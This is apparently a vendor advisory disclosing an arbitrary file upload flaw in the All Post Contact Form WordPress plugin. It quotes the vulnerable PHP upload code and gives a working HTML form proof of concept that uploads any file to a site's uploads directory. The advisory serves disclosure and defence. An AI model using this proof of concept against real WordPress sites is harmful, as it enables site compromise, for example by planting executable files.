Through the proactive monitoring of changes in WordPress plugins for serious vulnerabilities we do, we recently found an an arbitrary file upload vulnerability in the All Post Contact Form plugin.

When the plugins shortcode, rlallpostcontactform, is on a post or page the the file /allpost-contactform-core.php is included. In that file the following code is run:

53
54

if(is_uploaded_file($_FILES['attachment_file']['tmp_name'])){
move_uploaded_file($_FILES['attachment_file']['tmp_name'],WP_CONTENT_DIR.'/uploads/'.$_FILES['attachment_file']['name'] );

That code checks if a file is included with the request with attribute name set as  “attachment_file” and if it is then the file is saved to the directory /wp-content/uploads/.

We contacted the developer about the vulnerability a week ago, but have not heard back from them. In line with our disclosure policy, which is based on the need to provide our customers with information on vulnerabilities on a timely basis, we are now disclosing this vulnerability.

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/uploads/.

Make sure to replace “[path to shortcode post]” with the location of the post (or page) with the shortcode “rlallpostcontactform”.

<html>
<body>
<form action="[path to shortcode post]" method="POST" enctype="multipart/form-data">
<input type="file" name="attachment_file" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

• September 13, 2017 – Developer notified.

Concerned About The Security of the Plugins You Use?